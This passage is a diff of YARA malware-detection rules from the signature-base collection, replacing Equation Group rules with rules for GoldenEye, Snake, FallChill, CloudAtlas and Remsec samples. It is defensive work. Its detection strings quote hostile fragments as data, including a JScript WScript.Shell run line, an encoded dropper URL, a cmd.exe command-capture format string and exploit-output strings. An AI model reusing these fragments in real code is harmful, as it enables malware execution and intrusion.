-		uint32( 0 ) == 0x464c457f and filesize < 270 and all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 300KB and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_EQGRP_Callbacks
+rule SIGNATURE_BASE_APT_MAL_URL_Cloudatlas_Oct20_2 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - Callback addresses"
+		description = "Detects unknown maldoc dropper noticed in October 2020 - file morgue6visible5bunny6culvert7ambo5nun1illuminate4.url"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd1fbe09-4def-562d-825d-e790dc2c3dd9"
-		date = "2016-08-16"
+		id = "91f6362f-1793-58a3-a750-04ec9812b9df"
+		date = "2020-10-13"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1260-L1272"
+		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudatlas.yar#L18-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "34881cf8f9f29482a1e129f0f61470d4cc3fa6b78b9f6dda25862371896deca7"
+		logic_hash = "8bb60c262a34babbe8839f5d39d1c972eeb41ea77eaae02cc877d908c7033f13"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "a6a58b614a9f5ffa1d90b5d42e15521f52e2295f02c1c0e5cd9cbfe933303bee"
 
 	strings:
-		$s1 = "30.40.50.60:9342" fullword ascii wide
+		$hc1 = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75
+               74 5D 0D 0A 55 52 4C 3D 68 74 74 70 73 3A 2F 2F
+               6D 73 6F 66 66 69 63 65 75 70 64 61 74 65 2E 6F
+               72 67 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x495b and filesize < 200 and $hc1 at 0
 }
-rule SIGNATURE_BASE_EQGRP_Extrabacon_Output
+rule SIGNATURE_BASE_Goldeneye_Ransomware_XLS : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - Extrabacon exploit output"
+		description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2070ed7-e95a-534a-8f27-63c5ca9251b4"
-		date = "2016-08-16"
+		id = "6eafcc35-56ef-534f-884a-0bb47c27c274"
+		date = "2016-12-06"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1274-L1290"
+		reference = "https://goo.gl/jp2SkT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_goldeneye.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e71a4380dd30e68d89add1718976d3207a161d2d61fd4c3250fc4b10a0f53a0"
+		logic_hash = "827c1d1c0f9c3ebd77413de7e1db5e29d05f2ece6676c79a79f6c1ff2788f42b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
 
 	strings:
-		$s1 = "|###[ SNMPresponse ]###" fullword ascii
-		$s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii
-		$s3 = "[+] building payload for mode pass-disable" fullword ascii
-		$s4 = "[+] Executing:  extrabacon" fullword ascii
-		$s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii
+		$x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
+		$x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 1 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Unique_Strings
+rule SIGNATURE_BASE_Goldeneyeransomware_Dropper_Malformedzoomit : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - Unique strings"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08f5f1e3-ce4e-54ef-922f-50446edfcd70"
-		date = "2016-08-16"
+		id = "6ebf2d13-7d58-5a1b-a836-66d533f408e8"
+		date = "2016-12-06"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1292-L1305"
+		reference = "https://goo.gl/jp2SkT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_goldeneye.yar#L26-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "070358ec9cccb5d9daa4e5a016d4f9a988b600d675484f06dc9a897cadf7af0c"
+		logic_hash = "c18405a272c9210973e3184b8267306919cba8795b12d5982a9e3e8f748f9782"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
 
 	strings:
-		$s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
-		$s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)"
+		$s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
+		$n1 = "Mark Russinovich" wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
 }
-rule SIGNATURE_BASE_EQGRP_RC5_RC6_Opcode
+rule SIGNATURE_BASE_APT_MAL_RU_WIN_Snake_Malware_May23_1 : MEMORY
 {
 	meta:
-		description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b12a1a2c-8d32-5318-a658-6aa1a08c3263"
-		date = "2016-08-17"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1307-L1326"
+		description = "Hunting Russian Intelligence Snake Malware"
+		author = "Matt Suiche (Magnet Forensics)"
+		id = "53d2de3c-350c-5090-84bb-b6cde16a80ad"
+		date = "2023-05-10"
+		modified = "2025-03-21"
+		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_ru_snake_may23.yar#L17-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a79208c5924e1d5cc9db922f80403514e516eadb725393c1ebc9a6236ca90b98"
-		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "7cff7152259bb17a9b72b91f0fbef220aad2f35a1d2758d7225316a9896bf845"
+		score = 70
+		quality = 71
+		tags = "MEMORY"
+		threat_name = "Windows.Malware.Snake"
+		scan_context = "memory"
+		license = "MIT"
 
 	strings:
-		$s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B }
+		$a = { 25 73 23 31 }
+		$b = { 25 73 23 32 }
+		$c = { 25 73 23 33 }
+		$d = { 25 73 23 34 }
+		$e = { 2e 74 6d 70 }
+		$g = { 2e 73 61 76 }
+		$h = { 2e 75 70 64 }
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Implant : FILE
+rule SIGNATURE_BASE_APT_MAL_RU_Snake_Indicators_May23_1
 {
 	meta:
-		description = "EquationGroup Malware - file modifyAudit_Implant.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0321f6c0-2250-5991-a1d9-f0598e13c665"
-		date = "2017-01-13"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1337-L1353"
+		description = "Detects indicators found in Snake malware samples"
+		author = "Florian Roth"
+		id = "0d4fa8a7-447c-5905-bab9-b63de6209036"
+		date = "2023-05-10"
+		modified = "2025-03-21"
+		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_ru_snake_may23.yar#L45-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec8b54f3489b1eeef491b03641805e0e4db0b5cbbb67a3ae3d37dad184f54b01"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b7902809a15c4c3864a14f009768693c66f9e9234204b873d29a87f4c3009a50"
+		logic_hash = "cb7a4ad2ee0868f17b6235f070e4c03e2394e3c252253f334b29ad26116b09e5"
+		score = 85
+		quality = 35
+		tags = ""
+		hash1 = "10b854d66240d9ee1ce4296d2f7857d2b1c6f062ca836d13d777930d678b3ca6"
+		hash2 = "15ac5a61fb3e751045de2d7f5ff26c673f3883e326cd1b3a63889984a4fb2a8f"
+		hash3 = "315ec991709eb45eccf724dfe31bccb7affcac7f8e8007e688ba8d02827205e0"
+		hash4 = "417eb4fb9ada270af35562ff317807ac5ca9ee26181fe89990858f0944d3a6a7"
+		hash5 = "48112970de6ea0f925f0657b30adcd0723df94afc98cfafdc991d70ad3602119"
+		hash6 = "55ea557bcf4c143f20c616abe9075f7faafbf825aeef9ddb4f2b201acc44414b"
+		hash7 = "6568bbeeb417e1111bf284e73152d90fe17e5497da7630ccddcbc666730dccef"
+		hash8 = "81d620cb645006ffc9ac1b9d98a53aa286ae92b025bda075962079633f020482"
+		hash9 = "888a3029b1b8b664eb1fc77dd511c4088a1e28ae5535a8683642bb3dca011d00"
+		hash10 = "9027b4fef50b36289d630059425dc1137c88328329c3ea9dbc348dccd001adc0"
+		hash11 = "9ac199572cab67433726976a0e9ba39d6feed1d567d6d230ebe3133df8dcb7fa"
+		hash12 = "a64e5d872421991226ee040b4cd49a89ca681bdef4c10c4798b6c7b5c832c6df"
+		hash13 = "b5d2da5eb57b5ab26edb927469552629f3cf43bbce2b1a128f6daac7cf57f6f7"
+		hash14 = "bc15de1d1c6c62c0bf856e0368adabc4941e7b687a969912494c173233e6d28d"
+		hash15 = "bdf94311313c39a3413464f623bd75a3db2eb05cc01090acd6dcd462a605eb4a"
+		hash16 = "e4311892ae00bf8148a94fa900fc8e2c279a2acd3b4b4b4c3d0c99dd1d32353c"
+		hash17 = "ed74288b367a93c6b47343bc696e751b9c465761ce9c4208901726baa758b234"
+		hash18 = "ef1f1c7692b92a730f76b6227643b2d02a6e353af6e930166e3b48e3903e4ffd"
+		hash19 = "f5e982b76af7f447742753f0b57eec3d7dd2e3c8e5506c35d4cf6c860b829f45"
 
 	strings:
-		$s1 = "LSASS.EXE" fullword wide
-		$s2 = "hNtQueryInformationProcess" fullword ascii
-		$s3 = "hZwOpenProcess" fullword ascii
-		$s4 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s1 = "\\\\.\\%s\\\\" ascii fullword
+		$s2 = "read_peer_nfo" ascii fullword
+		$s3 = "rcv_buf=%d%c" ascii fullword
+		$s4 = "%s: (0x%08x)" ascii fullword
+		$s5 = "no_impersonate" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Lp : FILE
+rule SIGNATURE_BASE_TA17_318A_Rc4_Stack_Key_Fallchill : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file modifyAudit_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9dcfa774-0048-5bd9-ba7d-87bbdff9567a"
-		date = "2017-01-13"
+		description = "HiddenCobra FallChill - rc4_stack_key"
+		author = "US CERT"
+		id = "0a2afcab-f540-592f-aa75-64c0a13d26f3"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1355-L1372"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L10-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a908d44b831a27bb584c5da936346f77f0e205658ec2ebe0e600004645894593"
+		logic_hash = "f284cb492ff5242d7bf577580fd95723ef7d3f109c7217a26bbefbbff7150255"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
 
 	strings:
-		$s1 = "Read of audit related process memory failed" fullword wide
-		$s2 = "** This may indicate that another copy of modify_audit is already running **" fullword wide
-		$s3 = "Pattern match of code failed" fullword wide
-		$s4 = "Base for necessary auditing dll not found" fullword wide
-		$s5 = "Security auditing has been disabled" fullword wide
+		$stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $stack_key
 }
-rule SIGNATURE_BASE_Equationgroup_Processhide_Lp : FILE
+rule SIGNATURE_BASE_TA17_318A_Success_Fail_Codes_Fallchill : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ProcessHide_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b0842897-f591-5213-9a26-0f8732e6f3b8"
-		date = "2017-01-13"
+		description = "HiddenCobra FallChill - success_fail_codes"
+		author = "US CERT"
+		id = "f2390b03-238e-5ae6-af85-e5dd5790362f"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1374-L1393"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L23-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "407045f5ac8eeec4403560de406e5d382d38ae2f34d0e4c7d3cc9b94debdfad8"
+		logic_hash = "73f6b36554d83f7708e9468602e529c4865269d362ebeebf6b355ccf7c2a8686"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
 
 	strings:
-		$x1 = "Invalid flag.  Can only hide or unhide" fullword wide
-		$x2 = "Process elevation failed" fullword wide
-		$x3 = "Unknown error hiding process" fullword wide
-		$x4 = "Invalid process links found in EPROCESS" fullword wide
-		$x5 = "Unable to find SYSTEM process" fullword wide
-		$x6 = "Process hidden, but EPROCESS location lost" fullword wide
-		$x7 = "Invalid EPROCESS location for given ID" fullword wide
+		$s0 = { 68 7a 34 12 00 }
+		$s1 = { ba 7a 34 12 00 }
+		$f0 = { 68 5c 34 12 00 }
+		$f1 = { ba 5c 34 12 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and ( ( $s0 and $f0 ) or ( $s1 and $f1 ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Pwdump_Implant : FILE
+
+rule SIGNATURE_BASE_Hiddencobra_Fallchill_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file pwdump_Implant.dll"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55984c20-539e-5e51-b3c4-caa6157c993d"
-		date = "2017-01-13"
+		id = "5bbeb5ba-93d7-5903-9132-749afe5776ae"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1395-L1410"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L51-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20df7ef04154e317ee844545e541d62b3b8db4ac4800ba45a26b1092499c6e69"
+		logic_hash = "8e6215a81272ea457318dd83eff9e1902c5e1d1a124ff674b145f2dc5e4a3711"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dfd5768a4825d1c7329c2e262fde27e2b3d9c810653585b058fcf9efa9815964"
+		hash1 = "a606716355035d4a1ea0b15f3bee30aad41a2c32df28c2d468eafd18361d60d6"
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$s8 = ".?AVFeFinallySuccess@@" fullword ascii
-		$s3 = "\\system32\\win32k.sys" wide
+		$s1 = "REGSVR32.EXE.MUI" fullword wide
+		$s2 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
+		$s4 = "\" goto Loop" fullword ascii
+		$e1 = "xolhvhlxpvg" fullword ascii
+		$e2 = "tvgslhgybmanv" fullword ascii
+		$e3 = "CivagvTllosvok32Smakhslg" fullword ascii
+		$e4 = "GvgCfiivmgDrivxglibW" fullword ascii
+		$e5 = "OkvmPilxvhhTlpvm" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "6135d9bc3591ae7bc72d070eadd31755" or 3 of ( $s* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_5 : FILE
+
+rule SIGNATURE_BASE_Hiddencobra_Fallchill_2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_http_dll"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a67655eb-5593-5ac7-a6aa-81f235fa3c33"
-		date = "2017-01-13"
+		id = "c343e8e4-0785-5a47-99c1-98b189f4aaa0"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1412-L1428"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318A.yar#L79-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "834a7175a23c30301fce01482a2768d453368c7ca5c72ae52b2d266b31005991"
+		logic_hash = "ab421bea251ed3fda4304cd180e5c31f7ae55d3d8b26d6cf5f1cf11bacee9b8d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ebfc1f6ec6a0e68e47e5b231331470a4483184cf715a578191b91ba7c32094d"
+		hash1 = "0a118eb23399000d148186b9079fa59caf4c3faa7e7a8f91533e467ac9b6ff41"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s3 = "itanium" fullword wide
-		$s6 = "Copyright (C) Microsoft" fullword wide
+		$s1 = "%s\\%s.dll" fullword wide
+		$s2 = "yurdkr.dll" fullword ascii
+		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "cb36dcb9909e29a38c387b8a87e7e4ed" or ( 2 of them ) )
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll : FILE
-{
-	meta:
-		description = "EquationGroup Malware - file PC_Level3_http_flav_dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4bc4804b-c6d2-5c94-b451-24bb0f3dba43"
-		date = "2017-01-13"
+rule SIGNATURE_BASE_Remsec_Executable_Blob_32
+{
+	meta:
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "d7a7e57a-b117-5da8-a7a2-4c6351bd9072"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1430-L1447"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L8-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "579539961e29c4da60dc632b1afd348e0d799e266f175a3bae7206b615d90f5b"
-		score = 75
+		logic_hash = "1cfc43ab15b3d220a636c150315c30f5654e53fad67d20534ce4d5c00295e35e"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27972d636b05a794d17cb3203d537bcf7c379fafd1802792e7fb8e72f130a0c4"
+		tags = ""
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s4 = "itanium" fullword wide
-		$s5 = "RHTTP/1.0" fullword wide
-		$s8 = "Copyright (C) Microsoft" fullword wide
+		$code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_LSADUMP_Lp : FILE
+rule SIGNATURE_BASE_Remsec_Executable_Blob_64
 {
 	meta:
-		description = "EquationGroup Malware - file LSADUMP_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8068ca41-6365-5c97-82f2-be9ad89628e0"
-		date = "2017-01-13"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "22345f40-3dae-5d5b-acc6-c67394475636"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1449-L1462"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L22-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f67a64ae7fece949d37367d85a28a879e90844e5cc56e88a85a1cce890990f55"
-		score = 75
+		logic_hash = "957e5b6afabec3fb1b169dd85d0e950107e219f7dec8ef779a18bd90d9824a97"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
+		tags = ""
 
 	strings:
-		$x1 = "LSADUMP - - ERROR - - Injected" fullword wide
+		$code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Mstcp32 : FILE
+rule SIGNATURE_BASE_Remsec_Executable_Blob_Parser
 {
 	meta:
-		description = "EquationGroup Malware - file mstcp32.sys"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bed26a7b-933f-5578-b65c-65179959050d"
-		date = "2017-01-13"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1464-L1485"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "b2189bfe-7b84-5fe9-8829-64f49d1e2030"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L36-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aff97f8360a0c24bfde6a1b2616749d6cad3b19993716231d32b8bb59579c638"
-		score = 75
+		logic_hash = "2f6db962807c07ff1bbe8b53eeb386d7b0ac88f95b76439c0d8b65d597739bdd"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
+		tags = ""
 
 	strings:
-		$s1 = "mstcp32.sys" fullword wide
-		$s2 = "p32.sys" fullword ascii
-		$s3 = "\\Registry\\User\\CurrentUser\\" wide
-		$s4 = "\\DosDevices\\%ws" wide
-		$s5 = "\\Device\\%ws_%ws" wide
-		$s6 = "sys\\mstcp32.dbg" fullword ascii
-		$s7 = "%ws%03d%ws%wZ" fullword wide
-		$s8 = "TCP/IP driver" fullword wide
-		$s9 = "\\Device\\%ws" wide
+		$code = { ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 80 | 41 80 ) ( 7? | 7C 24 ) 04 02 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of them ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Nethide_Lp : FILE
+rule SIGNATURE_BASE_Remsec_Encrypted_Api
 {
 	meta:
-		description = "EquationGroup Malware - file nethide_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "39e96239-2189-5993-90ba-27e47f7bfdea"
-		date = "2017-01-13"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "1aa3380b-d704-5eb9-b25d-f4bf20ae7179"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1487-L1504"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L50-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "70e96a8ef5f75e05b3f6d32b9b8392316c3a70cb479549a3700134435b690473"
-		score = 75
